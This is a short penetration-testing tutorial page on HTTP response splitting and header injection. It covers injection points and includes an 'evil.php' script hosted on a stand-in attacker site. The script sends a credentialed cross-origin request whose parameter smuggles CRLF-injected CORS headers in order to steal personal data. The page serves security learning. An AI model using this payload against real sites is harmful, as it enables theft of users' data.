> For the complete documentation index, see [llms.txt](https://www.hackbook.io/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.hackbook.io/web-application-hacking/web-techniques/http-response-splitting.md).

# HTTP Response Splitting

The HTTP standard uses \r\n as part of it syntax/parsing to establish where data starts and headers end. Because of this an attacker may be able to prematurely split the response header and have a single response interpreted as 2 responses effectively creating 2 **response blocks**. This functionality can be abused.&#x20;

{% hint style="info" %}
This is different from [<mark style="color:purple;">**Header Injection**</mark>](#sop-bypass-header-injection) attacks where we are instead adding new headers to a single response block. &#x20;
{% endhint %}

### Things to look for:

* Application puts user input into a response header
* Set-Cookie is a good value to test
* Sites that pull referral domains to track your last visited site.&#x20;
* There may be sanitation to avoid

### Example from eLearn:

![Malicious Link](/files/cpQHKZ6lQEoiXcCvBqkS)

![Split Response](/files/w1g3jLw27kQ4MVdyWQ66)

This split response will make the browser load the second response into the browser. This response can contain such things as XSS and Apparent Defacement.

### SOP Bypass (header injection):

![](/files/3C0LFAycv6PYZxAfUpMJ)

![](/files/yNtcQrkuYKV50PRrKKUl)

Then the attacker would host an evil file at attacker.site/evil.php that will preform a JS call within the php to do a cross-domain AJAX request to steal data from the target domain.

{% tabs %}
{% tab title="evil.php" %}

```php
<script>
function loadXMLDoc()
    {
    var xmlhttp;
    xmlhttp=new XMLHttpRequest();
    xmlhttp.withCredentials =true;
    xmlhttp.onreadystatechange=function()
        {
        if (xmlhttp.readyState==4 && xmlhttp.status==200){
            document.getElementById("responseDiv").innerHTML=xmlhttp.responseText;
            }
    }
xmlhttp.open("GET","http://target.site/getPersonalData.php?trackingUrl=test%0d%0aAccess-Control-Allow-Origin;%20http://attacker.site%0d%0aAccess-Control-Allow-Credentials:%20true",true);
    xmlhttp.send();
    }</script>
```

{% endtab %}
{% endtabs %}

{% hint style="warning" %}
If the response splitting is not a vulnerable vector then the cross-origin request will be blocked.&#x20;
{% endhint %}
